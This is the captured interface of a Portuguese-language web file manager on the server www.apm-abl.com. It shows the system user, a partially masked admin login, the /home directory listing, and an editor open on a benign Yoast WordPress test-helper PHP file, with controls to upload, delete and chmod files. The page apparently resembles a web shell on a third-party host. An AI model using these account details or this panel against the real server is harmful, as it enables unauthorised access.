🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_397a3984 / 2423****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: notification.php
<?php namespace Yoast\WP\Test_Helper; /** * Test Helper Notification. */ class Notification { /** * The notification copy. * * @var string */ protected $message = ''; /** * The type of the notification. * * @var string */ protected $type = ''; /** * Constructs a notification. * * @param string $message Notification message. * @param string $type Notification type. */ public function __construct( $message, $type = 'info' ) { $this->message = $message; $this->type = $type; } /** * Returns the notification type. * * @return string The notification type. */ public function get_type() { return $this->type; } /** * Returns the notification copy. * * @return string The notification copy. */ public function get_message() { return $this->message; } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar